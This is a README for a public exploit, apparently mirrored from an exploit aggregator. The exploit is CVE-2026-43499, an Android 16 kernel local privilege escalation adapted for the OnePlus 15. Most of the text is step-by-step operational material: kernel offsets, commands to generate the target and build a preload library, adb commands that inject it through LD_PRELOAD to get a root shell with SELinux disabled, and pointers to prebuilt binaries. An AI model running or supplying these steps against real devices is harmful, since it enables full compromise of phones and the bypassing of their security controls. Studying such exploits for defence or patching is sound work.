Share
## https://sploitus.com/exploit?id=A138069F-8D47-52D8-BB93-EFFE9BC1124C
# CVE-2026-43499 for OnePlus 15

Android 16 local privilege escalation for OnePlus 15 (`pixel`).

Fork of [x-spy/CVE-2026-43499-popsicle](https://github.com/x-spy/CVE-2026-43499-popsicle)
with a kallsyms alignment fix and a verified OnePlus 15 profile.

## Verified kernel

```text
6.12.23-android16-5-gb2a876903b49-ab14541642-4k
```

## Profile

Profile contains two physical addresses that must be confirmed from a rooted device
running the same firmware:

```json
{
  "p0_phys_offset": "0x80000000",
  "p0_kernel_phys_load": "0xc7800000"
}
```

Auto-detect with a rooted device:

```sh
python3 detect_offset.py
```

## Generate target

Requires Python 3 and `llvm-objdump`:

```sh
python3 generate_target.py \
  --boot boot.img \
  --profile profile_oneplus15.json \
  -o source/src/target.h
```

## Build

```sh
make -C source clean preload
```

If NDK is not automatically detected:

```sh
NDK_ROOT=/path/to/android-ndk make -C source clean preload
```

Output: `source/build/bin/preload.so`

## Run

```sh
adb push source/build/bin/preload.so /data/local/tmp/preload.so
adb shell chmod 0644 /data/local/tmp/preload.so
adb shell LD_PRELOAD=/data/local/tmp/preload.so /system/bin/true
adb shell /data/local/tmp/su -c id
```

On success:

```text
uid=0(root) gid=0(root) groups=0(root) context=u:r:kernel:s0
direct-root-summary root=1 id=1 su=1/... selinux=1->0 uid=0 euid=0 gid=0 egid=0
```

After exploitation the device may show a kernel integrity warning on some builds.
A retry usually succeeds. A full reboot restores normal operation.

## Pre-built binaries

For the verified kernel, pre-built binaries are available in `prebuilt/`:

```sh
adb push prebuilt/preload.so /data/local/tmp/
adb push prebuilt/su /data/local/tmp/su
adb shell chmod 0644 /data/local/tmp/preload.so
adb shell chmod 0755 /data/local/tmp/su
adb shell LD_PRELOAD=/data/local/tmp/preload.so /system/bin/true
adb shell /data/local/tmp/su -c id
```

## Credits

- [x-spy](https://github.com/x-spy) for the original exploit and CVE discovery